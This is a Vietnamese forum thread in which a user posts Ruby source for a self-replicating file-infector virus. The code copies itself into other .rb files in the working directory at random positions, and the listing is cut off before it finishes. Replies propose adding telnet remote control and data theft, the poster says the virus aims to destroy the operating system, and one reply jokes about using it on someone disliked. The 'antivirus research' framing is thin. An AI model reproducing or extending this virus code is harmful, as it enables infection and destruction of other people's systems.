Code virus đơn giản bằng Ruby - P2

#1

Như topic trước: Code Virus đơn giản bằng Ruby Em đã chia sẻ đến mọi người dạng virus loại đa hình dạng cơ bản. Còn hôm nay, nhân vừa thức hết buổi trưa vọc :blush: , xin chia sẻ tiếp tới những ae cùng nghiên cứu AV (Antivirus nhé! :grin:). Dạng virus siêu đa hình được nâng cấp mạnh mẽ hơn và cũng ranh hơn, nên rất khó để bị bắt nhờ khả năng tự thay đổi địa chỉ + giả dạng tập tin đã được mã hóa + mở file ngẫu nhiên nhằm đánh lừa AV :joy:

# SPTH
mycode = ""
mych = File.open(__FILE__)
myc = mych.read(1)
while myc != nil
mycode += myc
myc = mych.read(1)
end
i = 0
while myc != "SPTH"
myc = mycode[i, 4]
i += 1
end
mycode = "# S" + mycode[i, 1382]
cdir = Dir.open(Dir.getwd)
cdir.each do |a |
    if File.ftype(a) == "file"
then
if a[a.length - 3, a.length] == ".rb"
then
if a != File.basename(__FILE__) then
fcode = ""
fle = open(a)
spth = fle.read(1)
while spth != nil
fcode += spth
spth = fle.read(1)
end
fle.close
i = 0
inf = 0
lc = 0
while i < fcode.length
i = i + 1
if fcode[i, 4] == "SPTH"
then
inf = 1
end
if fcode[i, 1] == 10. chr then
lc += 1
end
end
if inf != 1 then
ln = rand(lc)
precode = ""
i = 0
j = 0
while i < ln
precode += fcode[j, 1]
j += 1
if fcode[j, 1] == 10. chr then
i += 1
end
end
newcode = precode + 13. chr + 10. chr + mycode + 13. chr + 10. chr
while j <= fcode.length
newcode += fcode[j, 1]
j += 1
end
2 Likes
#2

@conan4582 @htwap @superthin @DepTraiNhatVinhBacBo @nguyenhuuca @TheSky

#3

Khi virus kích hoạt là mình đã chiếm được quyền rồi mà anh :blush: Phát triển thêm cho nó connect được với ip của mình qua telnet để chỉ huy nó :blush:

#4

Không rành phần này lắm, nên không biết đóng góp thế nào ta?
Virut này mục đích là gì ? Liệu có cần nền tảng gì để chạy nó không tazzz?
Nhưng ngủ trưaquan trọng lắm nhé.
Nên dành 15-30 Phút để ngủ trưa.
Đảm bảo thể trạng và sức khỏe cho buổi chiều và tối :grin:

2 Likes
#5

Lời khuyên hữu ích quá, em mất ngủ cả tuần rồi :joy: Chán quá ngồi dạy vọc code :joy:

1 Like
#6

Virus này nhằm mục đích phá hủy hệ thống và làm tê liệt hoạt động của hđh :sunglasses: Nếu được biên dịch ra file thực thi nó sẽ tự được set quyền admintrator và chạy đa nền tảng anh ạ :sunny:

1 Like
#7

:rage::rage::rage:
Ghét ai thì cho vào máy nó phải không nhỉ ?
Rồi chạy :smiling_imp:
Thay vì làm cái phá hủy thế này. Sao em không tạo ra virus có thể lấy cắp thông tin nhỉ :smiling_imp:

2 Likes
#8

Anh Sky dùng biểu tượng này chắc có mục đích mờ ám chăng :scream:

1 Like
#9

Virus này có thể cài đặt lệnh telnet để điều khiển từ xa nên ăn cắp thì cũng là một trong số đó :scream: Nhưng học hỏi để nghiên cứu thôi chứ anh :joy:

2 Likes
#10

Dùng gì để điều khiển từ xa nếu không có quyền truy cập nhỉ?
Học hỏi phải đi kèm với thực hành chứ :smiling_imp::smiling_imp::smiling_imp:

2 Likes
#11

Muốn học về mã độc này thì bắt đầu từ đâu nhỉ?em thấy ở Đại học đâu có dạy.Còn tự học thì kiếm tài liệu sao khó quá :joy:

2 Likes
83% thành viên diễn đàn không hỏi bài tập, còn bạn thì sao?